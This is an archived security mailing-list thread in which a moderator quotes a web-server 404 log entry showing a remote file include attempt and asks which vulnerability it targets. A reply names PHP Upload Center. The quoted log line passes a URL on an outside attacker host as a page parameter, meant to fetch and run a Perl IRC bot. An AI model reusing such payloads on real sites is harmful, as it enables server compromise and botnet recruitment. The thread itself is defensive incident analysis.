Incidents Dec 13 2006 11:39PM
modincidents mail securityfocus com (3 replies)
Re: Dec 14 2006 12:20PM
Adriano Carvalho (adriano carvalho urbi com br)
Re: Dec 14 2006 02:03AM
ascii (ascii katamail com)
Re: Dec 14 2006 12:33AM
Bojan Zdrnja (bojan zdrnja gmail com)
Hi Josh,

On 12/14/06, modincidents (at) mail.securityfocus (dot) com [email concealed]
<modincidents (at) mail.securityfocus (dot) com [email concealed]> wrote:
> An incidents subscriber emailed me stating that they were getting the
> following in there 404 logs:
> PHP.asp</activate.php?language=conf&footerpage=http://thebesthack.alterv
> It appears that an attacker is attempting to exploit a remote file include
> vulnerability. If the attack had been successful and the
> file was processed by the web
> server, it would have attempted to download, run, and then delete a file
> from
> is a simple IRC bot written in perl that will connect to
> and join #ddos.
> Does anyone know the specific vulnerability that this attack is attempting
> to exploit?

Yep, it's PHP Upload Center,



This List Sponsored by: Black Hat

Attend the Black Hat Briefings & Training USA, July 29-August 3 in Las Vegas.
World renowned security experts reveal tomorrow's threats today. Free of
vendor pitches, the Briefings are designed to be pragmatic regardless of your
security environment. Featuring 36 hands-on training courses and 10 conference
tracks, networking opportunities with over 2,500 delegates from 40+ nations.

[ reply ]


Privacy Statement
Copyright 2010, SecurityFocus